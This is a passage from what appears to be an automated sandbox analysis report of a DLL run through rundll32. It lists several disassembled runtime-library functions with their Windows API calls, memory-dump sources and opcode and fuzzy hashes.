                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                • String ID:
                • API String ID: 1913693674-0
                • Opcode ID: 9454dc167a4ff88182e540ef307a2bbb1adcd086a13c1c14dbb32208a20b8c1a
                • Instruction ID: e22667a4e35f41a5788a80cbd447b4fd44ebc042b03d52db810d2d323323788c
                • Opcode Fuzzy Hash: 9454dc167a4ff88182e540ef307a2bbb1adcd086a13c1c14dbb32208a20b8c1a
                • Instruction Fuzzy Hash: FA21C27160A705AFD7109F75C882D5BB7ADFF013687008519EE29976D0E738FC428B92
                Function 6F9F49E8 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                Download Yara Rule
                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 6F9F49F0
                  • Part of subcall function 6F9F4945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F8E9F,?,00000000,-00000008), ref: 6F9F49A6
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F9F4A28
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F9F4A48
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                • String ID:
                • API String ID: 158306478-0
                • Opcode ID: e9e8a88f779a4c5ede003a32aa79a75e6d8b8cdeab1903a1e24b7626ede81452
                • Instruction ID: a802c6e0a407c010a1fd07c567f1c5e96a8aec38052186ae87f01997ad2cc124
                • Opcode Fuzzy Hash: e9e8a88f779a4c5ede003a32aa79a75e6d8b8cdeab1903a1e24b7626ede81452
                • Instruction Fuzzy Hash: 511108B66076057E7B5157B9DE88C6F296DEE962A83200115FA00D12C1FB24DE134BB5
                Function 6F9F9F4D Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • WriteConsoleW.KERNEL32(00000000,00000000,6F9ED16B,00000000,00000000,?,6F9F85E1,00000000,00000001,?,?,?,6F9F29D8,?,00000000,00000000), ref: 6F9F9F64
                • GetLastError.KERNEL32(?,6F9F85E1,00000000,00000001,?,?,?,6F9F29D8,?,00000000,00000000,?,?,?,6F9F2FB2,00000000), ref: 6F9F9F70
                  • Part of subcall function 6F9F9F36: CloseHandle.KERNEL32(FFFFFFFE,6F9F9F80,?,6F9F85E1,00000000,00000001,?,?,?,6F9F29D8,?,00000000,00000000,?,?), ref: 6F9F9F46
                • ___initconout.LIBCMT ref: 6F9F9F80
                  • Part of subcall function 6F9F9EF8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F9F9F27,6F9F85CE,?,?,6F9F29D8,?,00000000,00000000,?), ref: 6F9F9F0B
                • WriteConsoleW.KERNEL32(00000000,00000000,6F9ED16B,00000000,?,6F9F85E1,00000000,00000001,?,?,?,6F9F29D8,?,00000000,00000000,?), ref: 6F9F9F95
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                • String ID:
                • API String ID: 2744216297-0
                • Opcode ID: a3185bcd108a9e4d421ec96081c44ad1292f464412ca5220d84a850510d6eeab
                • Instruction ID: f02eda1bff6fab2506e83819a3bef85ab0c1b282b33a23b8586a95b42d3c2165
                • Opcode Fuzzy Hash: a3185bcd108a9e4d421ec96081c44ad1292f464412ca5220d84a850510d6eeab
                • Instruction Fuzzy Hash: 34F0AC3A506615BBDF221F96DC0898A3F66EF0A3B5B144015FA19952A0C632DC72DB91
                Function 6F9E6E7F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RtlEncodePointer.KERNEL32(00000000,?), ref: 6F9E6EA4
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: EncodePointer
                • String ID: MOC$RCC
                • API String ID: 2118026453-2084237596
                • Opcode ID: b7ea80372e2aa32d0d273a24b643d8687a009bf4028ca506816135a60a3a3e41
                • Instruction ID: 628870d77b54a97706c25ce2e8683fb909baf9682ac22778a50da2ed3dd7031c
                • Opcode Fuzzy Hash: b7ea80372e2aa32d0d273a24b643d8687a009bf4028ca506816135a60a3a3e41
                • Instruction Fuzzy Hash: 1F415871910209AFDF06CF94C880AEE7BB9BF4A304F148499FA18AA291D335E960DB51